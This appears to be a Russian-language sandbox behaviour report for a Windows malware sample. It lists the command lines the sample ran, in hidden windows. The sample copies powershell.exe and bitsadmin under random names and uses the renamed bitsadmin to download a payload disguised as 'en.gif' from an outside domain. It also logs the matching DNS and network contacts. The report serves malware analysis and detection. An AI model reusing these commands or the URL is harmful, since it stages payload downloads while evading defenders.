Техническая информация
- '%ALLUSERSPROFILE%\oxkqbktin.exe' /transfer LKIpLQ /download https://estebankott.com/ordasum/DTMRFL58M13B923H/en.gif %APPDATA%\en.gif
- %ALLUSERSPROFILE%\zcetk.exe
- %ALLUSERSPROFILE%\oxkqbktin.exe
- 'es###ankott.com':443
- DNS ASK es###ankott.com
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zCeTk.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\oxKQBKt*.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\oxkqbktin.exe' /transfer LKIpLQ /download https://estebankott.com/ordasum/DTMRFL58M13B923H/en.gif %APPDATA%\en.gif' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zCeTk.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\oxKQBKt*.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zCeTk.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\oxKQBKt*.exe